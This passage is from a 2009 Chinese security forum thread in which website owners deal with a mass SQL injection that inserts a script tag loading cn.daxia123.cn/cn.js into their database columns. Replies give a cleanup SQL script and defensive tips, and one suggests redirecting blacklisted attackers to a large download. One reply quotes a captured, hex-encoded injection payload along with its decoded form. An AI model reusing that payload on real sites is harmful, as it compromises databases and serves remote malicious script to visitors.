瑞星卡卡安全论坛技术交流区入侵防御(HIPS) 求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

«23456789   8  /  9  页   跳转

求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

回复 1F allenxing 的帖子

用DW把该代码批量删除,这是非法的恶意链接.
gototop
 

回复 71F 淘气学子 的帖子

这个不是在代码中的,是直接写入数据库的
gototop
 

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

/***********定义要去除的字符,请注意,可能不止一条,我的服务器就查到两条************/
declare @delStr nvarchar(500)
set @delStr='<script src=http://cn.daxia123.cn/cn.js></script>'
--set @delStr='<script src=http://cn.jxmmtv.com/cn.js></script>'
/****************************************/

/**********以下为操作实体************/
set nocount on

declare @tableName nvarchar(100),@columnName nvarchar(100),@tbID int,@iRow int,@iResult int
declare @sql nvarchar(500)

set @iResult=0
declare cur cursor for
select name,id from sysobjects where xtype='U'

open cur
fetch next from cur into @tableName,@tbID

while @@fetch_status=0
begin
  declare cur1 cursor for
        --xtype in (231,167,239,175,99,35) 为char,varchar,nchar,nvarchar,ntext,text类型
        select name from syscolumns where xtype in (231,167,239,175,99,35) and id=@tbID
  open cur1
  fetch next from cur1 into @columnName
  while @@fetch_status=0
  begin
      set @sql='update [' + @tableName + '] set ['+ @columnName +']= replace(convert(nvarchar(4000),['+@columnName+']),'''+@delStr+''','''') where ['+@columnName+'] like ''%'+@delStr+'%'''     
      exec sp_executesql @sql     
      set @iRow=@@rowcount
      set @iResult=@iResult+@iRow
      if @iRow>0
      begin
    print '表:'+@tableName+',列:'+@columnName+'被更新'+convert(varchar(10),@iRow)+'条记录;'
      end     
      fetch next from cur1 into @columnName


  end
  close cur1
  deallocate cur1
 
  fetch next from cur into @tableName,@tbID
end
print '数据库共有'+convert(varchar(10),@iResult)+'条记录被更新!!!'

close cur
deallocate cur
set nocount off
/*****以上为操作实体******/
gototop
 

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

这个东西是asp页面攻击,从log记录看到这个东西
QUERY_STRING:matchid=155;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);--

中间这二进制转换了就是:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u'
AND b.xtype in (99,35,231,167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
print ('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
gototop
 

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

解决办法,在asp页面里加入防注入代码就行,
攻击者是利用软件提交url的,从http头可以看出:
ALL_HTTP:HTTP_HOST:finance.jmcatv.com.cn
HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP_COOKIE:ASPSESSIONIDSCATDTRT=BDMADAACPKFKLCNABMGEJONK
HTTP_CACHE_CONTROL:no-cache
ALL_RAW:Host: finance.jmcatv.com.cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Cookie: ASPSESSIONIDSCATDTRT=BDMADAACPKFKLCNABMGEJONK
Cache-Control: no-cache

返回警告语句没用,最好是
重定向到其它页面:如叫他下载个软件,呵呵,要大文件下载,
如警告无效后,将它列入黑名单,再访问时,就叫它下载:
If IsBlackIP(GetCIP) Then           
'//黑名单访问,送它一免费杀毒软件,以示警告!呵呵呵,毒!
  response.redirect "http://download.rising.com.cn/Middle/RavolSKY.exe"
End If
gototop
 

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

对于被黑的网站,如大量asp页面,需要进行asp安全性检测和进行批处理加入防注入的,或对所有静态动态页面进行批量清除无用代码非法代码的,可用delphi设计入简单的程序处理。如果不会,我做了个,可以留下你的email,我将程序和代码发给你。
gototop
 

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

今天下午发现的,俺现在还在加班弄这个破数据库……强烈谴责这一无聊无耻的行径!!

俺就那几个特殊页面没加过滤,他就TMD找到了,我哭了~~~~以后EXEC是肯定要过滤的!!不管了~~气愤中……
最后编辑YMStudio 最后编辑于 2009-01-09 19:57:22
gototop
 

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

我也深受其害,好在我有自己的服务器,可以安装urlscan,设置url长度,暂时还凑效,一天来好几个攻击都被挡住了,看了一下ip地址,韩国的居多,还有美国、卡塔尔和国内等
gototop
 

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

楼上,能不能详细说一下?
gototop
 

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

楼上,能不能具体说一下urlscan怎么配置
gototop
 
«23456789   8  /  9  页   跳转
页面顶部
Powered by Discuz!NT